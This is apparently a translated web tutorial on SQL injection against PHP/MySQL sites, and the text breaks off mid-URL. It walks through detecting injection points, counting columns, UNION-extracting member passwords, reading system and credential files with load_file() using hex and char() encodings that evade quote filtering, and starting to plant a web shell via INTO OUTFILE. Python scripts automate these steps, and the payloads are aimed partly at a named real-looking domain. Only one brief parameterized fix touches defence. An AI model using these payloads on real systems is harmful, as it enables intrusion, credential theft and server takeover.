PHP injection and anti-Injection

Source: Internet
Author: User
Tags mysql functions

In this era when injection is everywhere, plenty of newbies are running around with point-and-click tools. If you do not want to be a slave to those tools, if you do not want to back off the moment you run into PHP, and if you do not want to stay in the newbie crowd forever, then calm down and follow me through a complete intrusion test. I believe you will gain something from it, not only in technique but also in approach and awareness.


Determine whether injection exists: the first step is the same for PHP and ASP. Append and 1=1 and then and 1=2 to a dynamic parameter and compare the two responses. If the two pages differ (the first returns normally, the second returns nothing or an error), you have preliminarily identified an injection point.


Determine the number of fields: next we use ORDER BY to find out how many columns the PHP page's query selects:


http://127.0.0.1/1.php?id=1 order by 40 // If the page returns normally, the query has at least 40 columns. Keep increasing the number until the page returns an error.

For example, if http://127.0.0.1/1.php?id=1 order by 45 returns an error while order by 44 still returns normally, we know the query has 44 columns.

Union select: once the column count is known, use a UNION SELECT query to display all the field positions.

http://127.0.0.1/1.php?id=1 and 1=2 union select 1,2,3,4,~44/* // here we list all 44 fields; and 1=2 empties the original result so the numbers of our UNION row are what the page shows, and the trailing /* comments out whatever the application appends after our input.

Whichever numbers appear on the page are the displayed positions. Replace such a number with the column name you want and add a FROM clause naming the table, and that column's content appears in that position. For example:

http://127.0.0.1/1.php?id=1 and 1=2 union select 1,2,3,4,~30,passwd,32,~44 from member/* // the ~ means "omitted here"; you cannot actually write it like that, every position must be spelled out.
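The three steps above (the and 1=1 / and 1=2 test, the ORDER BY probe and the UNION SELECT pull), as an added example that is not part of the original article. It uses an in-memory sqlite3 database as a stand-in for the target's MySQL server, a constructed news/member schema, and a hypothetical page function modelling 1.php; the trailing /* is left off because the simulated page appends nothing after the parameter. A parameterized version of the same query is included to show the anti-injection side of the title: against it the and 1=1 / and 1=2 test no longer distinguishes anything.

```python
import sqlite3
from typing import Callable, List, Optional

# Constructed sample schema standing in for the target's MySQL database.
# sqlite3 is used only because it ships with Python; the probes below
# (and 1=2, order by N, union select ... from ...) read the same on MySQL.
SCHEMA = """
CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO news VALUES (1, 'hello', 'first post', 'admin');
CREATE TABLE member (id INTEGER, username TEXT, passwd TEXT);
INSERT INTO member VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""

Page = Callable[[str], Optional[List[tuple]]]


def make_pages():
    """Return two stand-ins for 1.php?id=...: one that concatenates the id
    parameter into the SQL text (the injectable page) and one that binds it
    as a parameter (the fix). Each returns the rows, or None when the
    database raised an error, which is the 'page returns an error' signal
    the article relies on."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    base = "SELECT id,title,body,author FROM news WHERE id="

    def vulnerable(id_param: str):
        try:
            return db.execute(base + id_param).fetchall()  # string concatenation
        except sqlite3.Error:
            return None

    def fixed(id_param: str):
        try:
            return db.execute(base + "?", (id_param,)).fetchall()  # bound parameter
        except sqlite3.Error:
            return None

    return vulnerable, fixed


def is_injectable(page: Page) -> bool:
    """Step 1: 'and 1=1' and 'and 1=2' must give different results."""
    return page("1 and 1=1") != page("1 and 1=2")


def find_column_count(page: Page, limit: int = 64) -> int:
    """Step 2: raise ORDER BY N until the database errors; the last N that
    still worked is the number of columns in the original query."""
    n = 1
    while n <= limit and page(f"1 order by {n}") is not None:
        n += 1
    return n - 1


def union_extract(page: Page, ncols: int, column: str, table: str,
                  slot: int) -> Optional[str]:
    """Step 3: 'and 1=2' empties the real result so the UNION row is what
    the page displays; `column` from `table` goes into display position
    `slot` (1-based) while the other positions keep their marker numbers.
    Returns None when the database errored (e.g. wrong column count)."""
    fields = [str(i) for i in range(1, ncols + 1)]
    fields[slot - 1] = column
    rows = page(f"1 and 1=2 union select {','.join(fields)} from {table}")
    if not rows:
        return None
    return rows[0][slot - 1]


if __name__ == "__main__":
    vuln, fixed = make_pages()
    print("injectable:", is_injectable(vuln), "/ fixed page:", is_injectable(fixed))
    ncols = find_column_count(vuln)
    print("columns:", ncols)
    print("passwd:", union_extract(vuln, ncols, "passwd", "member", 3))
```

On a real target the oracle is the HTTP response rather than a Python call, but the decision logic is identical: an error page for ORDER BY N+1 and a normal page for ORDER BY N gives N columns, and a UNION with the wrong count errors just as it does here.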

Several common MySQL functions: well, now that we have listed all the fields, some readers are probably eager to add a FROM clause and start guessing the password. Actually the password can wait until later. Some people say MySQL's functions are no better than ACCESS's, or even worse. That is a misunderstanding and does MySQL an injustice; let's look at MySQL's more advanced uses.
Here are several common functions first: 1: system_user() 2: user() 3: current_user() 4: session_user() 5: database() 6: version() 7: load_file(). Their meanings are as follows:

1: the user name and host the client connected with (system_user() is a synonym for user(), not the operating-system account). 2: the connecting user name and host. 3: the account the server actually authenticated this session as, which is what privilege checks use and may differ from user(). 4: the same as user() (session_user() is another synonym). 5: the current database name. 6: the database version. 7: the function MySQL uses to read a local file on the server.

What are they for? Functions 1 to 6 serve this purpose:

The information these functions return plays an important role during testing. It helps you understand and analyze the target, find weaknesses and broaden your thinking. For example, version() tells you the database version and hence whether the server supports UNION (MySQL 4.0 and later), and user() or current_user() tells you whether you are connected as root... Function 7 does far more, so we discuss it separately.


This section describes the use and tricks of the load_file() function.
OK. load_file() is the MySQL function that reads a local file on the database server. When the account our injection runs as can read and write files, load_file() is extremely useful. How do we tell whether the injection point has that privilege? It is easy: append and (select count(*) from mysql.user)>0/* after the injection point. If the page returns normally, the current user can read the mysql.user table, which in practice means a highly privileged account (usually root) and hence the FILE privilege needed to read and write files. Strictly speaking FILE is a separate grant, recorded in the File_priv column of mysql.user, and on newer servers the secure_file_priv setting can restrict load_file() to one directory or disable it entirely, so a normal response to this test is a strong hint rather than proof. With this function we can read sensitive system files and find configuration files, database connection files, material for social engineering, and the web root's physical path. Below is a summary of sensitive files:
WINDOWS (the char() lists omit the drive letter; a path without one refers to the current drive):
load_file(char(47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105))   c:/windows/php.ini // do I need to say what is in there?
load_file(char(47,119,105,110,110,116,47,112,104,112,46,105,110,105))   c:/winnt/php.ini
load_file(char(47,119,105,110,100,111,119,115,47,109,121,46,105,110,105))   c:/windows/my.ini // the user name and password may be left behind from when the administrator logged in to MySQL.
load_file(char(47,119,105,110,110,116,47,109,121,46,105,110,105))   c:/winnt/my.ini
load_file(char(47,98,111,111,116,46,105,110,105))   c:/boot.ini

On LINUX/UNIX:
load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100))   /etc/passwd // no explanation needed?
load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102))   /usr/local/httpd/conf/httpd.conf // you may find the default website directory here!
load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102))   /usr/local/apache2/conf/httpd.conf // you may find the default website directory here!
FreeBSD:
load_file(char(47))   / // reading the directory itself lists the root directory of the FreeBSD system

Some friends may be asking by now: what is that? What is char? What is that string of numbers? (If you don't understand, you don't have to ask; Google is your friend.)
In fact, even with an injection point that has read/write privileges, submitting load_file(c:\boot.ini) directly generally produces no echo: the path must be a string, and the quoted form load_file('c:\boot.ini') is usually broken by quote filtering on the application side (PHP's magic_quotes_gpc or addslashes() escapes the quote). So you have two options. 1. Convert the path to a hexadecimal literal and submit that directly to the database. 2. Convert the path to decimal byte values and use the char() function to turn them back into the ASCII string.
For example, c:\boot.ini in hexadecimal is 0x633A5C626F6F742E696E69, which can be used directly as load_file(0x633A5C626F6F742E696E69). Converted to decimal it is 99 58 92 98 111 111 116 46 105 110 105; before using that with char() you need to do a batch replace in your text file and turn every space into a comma, giving load_file(char(99,58,92,98,111,111,116,46,105,110,105)). Be sure not to drop the closing parentheses; they must balance.
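The two encodings described above, as an added helper that is not part of the original article (the function names are mine): it produces the 0x... and char(...) forms of a path, confirms neither form contains a single quote, and decodes a char() list back to text so the lists earlier on this page can be checked before they are sent.

```python
import re


def to_hex_literal(path: str) -> str:
    """Option 1: a MySQL hex literal (0x...) is a string and needs no quotes."""
    return "0x" + path.encode("latin-1").hex().upper()


def to_char_call(path: str) -> str:
    """Option 2: the decimal byte values wrapped in char(), also quote-free."""
    return "char(" + ",".join(str(b) for b in path.encode("latin-1")) + ")"


def from_char_call(expr: str) -> str:
    """Decode a char(...) list back into text, e.g. to audit a copied list
    before sending it; whitespace and a stray trailing comma are ignored."""
    return bytes(int(n) for n in re.findall(r"\d+", expr)).decode("latin-1")


def load_file_payloads(path: str) -> dict:
    """Both quote-free load_file() forms for a path. Neither contains a
    single quote, so addslashes()/magic_quotes_gpc has nothing to escape."""
    payloads = {
        "hex": f"load_file({to_hex_literal(path)})",
        "char": f"load_file({to_char_call(path)})",
    }
    for form in payloads.values():
        assert "'" not in form, form
    return payloads


if __name__ == "__main__":
    for path in ("c:\\boot.ini", "/etc/passwd"):
        for form, payload in load_file_payloads(path).items():
            print(f"{path:12} {form:4} {payload}")
    print(from_char_call("char(47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105)"))
```

The decoder is the useful half: copying a long decimal list by hand is exactly where one dropped byte turns /etc/passwd into /et/passwd, and a quick round trip catches that before the request goes out.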
Having got this far, I can already hear another newbie shouting: got it, let's go and run it! Don't rush. Read on.


You only need to place load_file() in one of the field positions that is displayed on the page, preferably one with enough room to show the file you want. Not enough room? Don't panic, I'll teach you a few more tricks.

1: Sometimes you are sure you have file read/write privileges, yet you still cannot read a file, or only get a blank. Why? One possibility is that the target has configured its permissions well: your user cannot read files owned by the administrator, and both NTFS and Linux can enforce that. If you have ruled that out, consider whether the content you read is being interpreted by the browser as HTML, ASP, PHP, ASPX, JSP, and so on. If the content contains symbols such as <, the browser treats your file content as markup and you naturally see nothing. Dealing with this is simple: replace those special symbols with something else while reading, so the browser has nothing to interpret. How? MySQL has replace(load_file(A), char(B), char(C)): when reading file A, every occurrence of the character B is replaced by the character C before it is displayed. OK, concretely: replace(load_file(A), char(60), char(32)). Here char() turns the number into a character, so every < becomes a space, and you get the complete echo.

2: None of the field positions has room to echo the whole thing, and the file you read comes back truncated. What then? Use substring(str, pos, len), which returns len characters of str starting at position pos. For example substring(load_file(A), 50, 100) shows you characters 50 through 149 of A's content, so you can read the file piece by piece.

Advanced use of INTO OUTFILE!
OK, that is enough about load_file(). There is plenty more to come. Here I want to discuss a very important method of application, which is also the part of the technique I focus on in several write-ups. First we confirm the following conditions:
1. We know the physical path of a directory we can write to (INTO OUTFILE takes a physical path, and it refuses to overwrite an existing file, so use a new file name).
2. UNION can be used (that is, MySQL 4.0 or later; UNION was added in 4.0).
3. The other side does not filter ' (the file name after INTO OUTFILE must be a quoted string literal; unlike a load_file() argument it cannot be replaced by char() or a hex literal).
4. The MySQL user has the FILE privilege (file_priv); otherwise it can neither write nor read file contents. On newer servers the secure_file_priv setting must also permit the target directory.
5. The system account MySQL runs as has write permission on the web directory. On Windows it generally does; on Linux web directories are usually rwxr-xr-x, which means group and other users have no write permission.

For condition 1 we can usually rely on the database error messages that pop up; if there are none, the path can also be obtained with load_file() on configuration files. Condition 2 is generally fine. Condition 3, filtering of the quote, is also rare. Condition 4, do we have the privilege? We tested that earlier. Condition 5: if we cannot write into the web site's path, there are other methods, such as the startup folder, run entries and so on; generally it is worth trying upload directories and image directories, since most of them are writable.
OK, the required conditions are settled. How is this used? We split the usage into two parts.

Usage 1: the regular usage. We all know the idea: use the site's message board, upload function and the like to deposit your one-liner, and then make use of it.


http://www.tian6.com/coder.php?id=1 and 1=2 union select 1,load_file(/www/home/html/upl
